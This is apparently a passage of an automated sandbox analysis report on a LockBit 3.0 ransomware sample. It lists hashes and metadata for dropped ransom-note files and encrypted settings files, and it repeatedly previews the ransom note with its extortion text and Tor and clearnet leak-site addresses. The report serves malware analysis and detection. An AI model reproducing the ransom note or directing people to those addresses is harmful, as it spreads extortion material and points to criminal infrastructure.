                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.9777657637308055
                Encrypted:false
                SSDEEP:192:tszQFRUVjEHG9nsmJDDglUF9pL+1ZSR5KOUuF/q9iyjlaNo:tscFRUVjEdmJvglUrY18LKPus9i/W
                MD5:D6109C047E7A41DCB54618DDF6E181EC
                SHA1:F4719B50FD5A6C0CC8A6092E7880C3D7C05ABEE2
                SHA-256:024CB81C0D3E85C3E7E247B7CE339E0C76C4B869DFB9264852A6581D9013A628
                SHA-512:5438F6C461EF4A23E7A681426C35625015BBE54A70115C1463CE07BBDEF4488F2E2ED1D9CCC5076F93A454EE1665D7E287E09AFECD0C86F462DF8B242E7E7437
                Malicious:false
                Preview:cx(..p.....xw.|x..Q.9.H..X.../.....u.-.`.>e.o;..L-...4.]G..0..L..d..VE.i...8v...........F..bg..4.R.d.m.z.f.g....1i.....$.......".....!.\.2...r8.].D...D}..!:.x..!.m..x.ez.eZ*_.....!^[..50'.J.|...1.i..z...G.~Y.r6..4. ....rU.H)...>..b5Q...!..e?._M.r........}P,%....q.-...a.?2.0.J.L.....{.....BA..3.#e}#l..)b.l..E..-..XoWMC....1..i)..-..Lx.....x.U..U...).i.b.~....o.....K...v@.Qf0z...1....}i0fI?.^.jn'.D (i..YG.#v.....4.B....?Zv..B......]9_..U....6W..1....[.4?.s..N.`..N>..&....W. ..V.bc.\...%F..(..<..J.....].w....2......t.y.....cJ.~.........j3#.#..1.......!.u..._rB...1{.T......#4s.........'...1.b....V...e..d.xUW..n....+...L........h.L..U...\)...W.f......W.Lq.".uUfy}.Z.Lt6L..C.c d.[@BC5....6..q....|g......2....+."7...'_......]v.h.....d7.2r:......2.h...g1.W"..s...B./.EK.....@33?.}-87*G.8.r..<.b3).b`. .........x.B.9..f(.u........|...<3.(V|uG......#2.N.m.. ..a..( X..!..j..>..*..d.p....1..n.:.4..*.....l\.>.E+...n..Y.)s.w....(E..Xr8.P.U.1.n....{ L.....v[.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.979872153467779
                Encrypted:false
                SSDEEP:192:ovzXcsCgltql4va2kbFXQZLA6WsBW1tPnxK/Tcp7esKUNI3Xo:YRCsglUaVmXWjPnV7eRUeI
                MD5:AA4B34C6A13C5B22A3A482DBB4DBB634
                SHA1:FB608A521B00732BA0F1B7472F903077AD7F2434
                SHA-256:3E5F6ADB35154960C922C2271CF7E345D5DC43182B16C75CE276979CACD1CA9E
                SHA-512:3E7DFDFF6AC1F7E50C6B9480FBC0F0B3B0F6A035A92F50A394DF9C17E2E1C8507903CCBC9C5C2FE8B73419DCC4B6E912650E42A0FF3E48A05F4DC85A930EA4B3
                Malicious:false
                Preview:uw,..W.%=w..<.Y7".z>'\w8F.. /..T...8...&kc....{.H:.n..~O.4.....%..Q+zT.Q:....... ..o.(......F.a;i.......:?R.. 5.L'.'H.k..x.........Ecp.x.$.3@....`|..=.Qa.(cZ!..u....3.my...g.w..Gap.9......C%.u..`t.....5l...t..d.9...9DI`.......#ed.%...h`....K...G.0.yO`.2y...{:6..w.@.R...u.!..O.C.?z..0..|..D.kd...f.$X..,*/W.N...Q..6z..S .'.c...Yq..."R..%..$)..1S.(....:6.........a.t.h.T9I.....4..d...pw..0.\Cdx.?.....k.X...(..8^I.)f...(....;x.c.P%.....h.2.9Cq.p...=h4G.r.yw@.......3..5.^.;....2.$?.....p...*.3......E...FY(F..g.A2^e....`....L7....LW%..U4I.^!3..f.[).sy.G.Ct1.2.b...x..2..M.....T.s.D......S..G...^.....]#..........f...\..t..',...6.h..8...b..)[.,N....L.rL8l.5$.[..u..3.w4u..@.9}..4o.?.....1$....zOyz...~......+b..h....x..s........~..\^W..{..^.!&..h..8%.&.S?0.|.(..........<'."..VBGs..m.H.I#.;....Aj\...9.N..'...6Z......`|V.2..l...eVu.......5..O.O.....E.'.1.1...g....Q..R....?.."..'.`..m^.....;t09G.X...5Jh.;.{.Q.....a.D!1......8l....Z.Lx.x%......[.8...l. ...

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

